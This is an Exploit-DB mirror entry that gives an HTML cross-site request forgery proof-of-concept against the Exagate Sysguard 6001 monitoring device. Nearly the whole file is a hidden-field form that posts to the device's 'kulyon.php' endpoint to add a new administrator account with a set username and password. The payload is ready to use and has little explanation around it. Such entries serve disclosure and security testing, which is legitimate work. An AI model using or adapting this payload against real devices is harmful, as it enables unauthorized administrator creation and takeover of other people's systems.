exploit-db-mirror/exploits/php/webapps/48234.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

19 lines
No EOL
652 B
Text

# Exploit Title: Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.exagate.com/
# Software Link: https://www.exagate.com/sysguard-6001
# Version: SYSGuard 6001
HTML CSRF PoC :
<html>
<body>
<form action="http://target/kulyon.php" method="POST">
<input type="hidden" name="username" value="joke" />
<input type="hidden" name="password" value="159384" />
<input type="hidden" name="privilege" value="0" />
<input type="hidden" name="button" value="Ekle" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>